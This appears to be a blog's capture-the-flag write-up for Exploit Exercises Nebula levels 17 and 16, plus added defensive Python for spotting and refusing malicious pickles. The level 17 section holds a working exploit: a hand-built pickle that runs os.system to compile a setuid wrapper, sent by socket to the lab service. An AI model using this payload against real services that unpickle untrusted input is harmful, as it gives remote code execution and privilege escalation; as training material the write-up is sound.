Exploit Exercises Nebula — level17

An initial reading reveals that the issue here is serialization via pickle (even if you’re not a Pythonaut, it stands out in the code).

Going to the documentation, one can immediately spot the following line:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Fair enough. A little bit of digging revealed this. Looks like the game is over. Let’s try that out:

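#!/usr/bin/python
# Python 2 script, matching the interpreter on the Nebula VM.
import socket

# Hand-written protocol 0 pickle: GLOBAL os.system, one string argument, REDUCE (call), STOP.
egg = "cos\nsystem\n(S'gcc /tmp/wrap.c -o /tmp/wrap && chmod +s /tmp/wrap'\ntR."

print egg

s = socket.socket()
host = "192.168.1.18"
port = 10007

s.connect((host, port))
# Read the service banner, then send the pickle.
print s.recv(1024)
s.send(egg)
# The original had a bare "s.close", which never actually closed the socket.
s.close()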

Here wrap.c is just a C wrapper around a system("/bin/getflag") call. Instead of using the Python script, you can also just send the egg string with nc. Continuing:

level17@nebula:~$ /tmp/wrap
You have successfully executed getflag on a target account

Great success.

Addendum: I did not stop at reading the documentation; a little bit of googling revealed this, this, and this. All three links are worth reading.
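The documentation warning quoted above, turned into a check (an added example in Python 3, not code from the original post): it lists the import and call opcodes in a pickle without loading it, and loads data through an unpickler that refuses every global. The names risky_opcodes, NoGlobalsUnpickler and safe_loads and both sample inputs are constructed for illustration.

```python
import io
import pickle
import pickletools

# Opcodes that import or call objects while a pickle is being loaded.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


def risky_opcodes(data):
    """Statically list import/call opcodes in a pickle without executing it."""
    found = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in RISKY_OPCODES:
            found.append((opcode.name, arg))
    return found


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every module.attribute lookup."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "global %s.%s is forbidden" % (module, name))


def safe_loads(data):
    """Load a pickle made only of plain containers, strings and numbers."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


# Constructed sample: same shape as the post's egg, with a harmless command.
SAMPLE_EGG = b"cos\nsystem\n(S'echo constructed-sample'\ntR."
# Constructed benign input: a plain dict serialized with protocol 0.
SAMPLE_OK = pickle.dumps({"user": "level17", "id": 1016}, protocol=0)

if __name__ == "__main__":
    print(risky_opcodes(SAMPLE_EGG))   # GLOBAL + REDUCE give it away
    print(safe_loads(SAMPLE_OK))       # plain data still loads
    try:
        safe_loads(SAMPLE_EGG)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

The static scan suits logging and triage; the restricted unpickler is the control that actually stops the load, and it only fits services that exchange plain data.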

Exploit Exercises Nebula — level16

Long time no see. Again: trips, trips, trips!

It turned out that I couldn’t solve this level all by myself. What needs to be done is pretty trivial; however, I couldn’t find a way to do it. So, without further ado, I recommend reading this or this.

Also, I’d like to give a piece of advice here: never give up. If you know that you did your best, don’t be ashamed to look for solutions. Contemplate them and move on. After all, learning from others is the best method to learn.